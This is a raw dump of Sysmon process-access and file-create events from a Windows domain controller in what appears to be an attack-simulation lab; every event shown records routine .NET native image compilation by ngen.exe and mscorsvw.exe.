13:27:11.062{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-D804-000000009A01}3532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.015{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-D704-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:10.999{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-D704-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:10.999{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-D704-000000009A01}4148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000009007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.843{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B0-6000-E304-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.827{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46B0-6000-E304-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.827{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B0-6000-E304-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000009004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.780{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B0-6000-E204-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.765{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B0-6000-E204-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.765{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B0-6000-E204-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000009001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:12.702{08A6967A-46B0-6000-E104-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13d4-0\UIAutomationProvider.dll2021-01-14 13:27:12.702 10341000x80000000000000009000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.624{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B0-6000-E104-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.608{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46B0-6000-E104-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.608{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B0-6000-E104-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B0-6000-E004-000000009A01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.546{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46B0-6000-E004-000000009A01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:12.546{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B0-6000-E004-000000009A01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:12.468{08A6967A-46AF-6000-DF04-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1174-0\UIAutomationClientsideProviders.dll2021-01-14 13:27:12.468 10341000x80000000000000008993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.999{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-DF04-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.983{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-DF04-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 11241100x80000000000000009025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:13.937{08A6967A-46B1-6000-E804-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d4c-0\XamlBuildTask.dll2021-01-14 13:27:13.937 10341000x80000000000000009024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.655{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B1-6000-E804-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.640{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46B1-6000-E804-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.640{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46B1-6000-E804-000000009A01}3404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000009021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46B1-6000-E704-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:13.562{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46B1-6000-E704-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 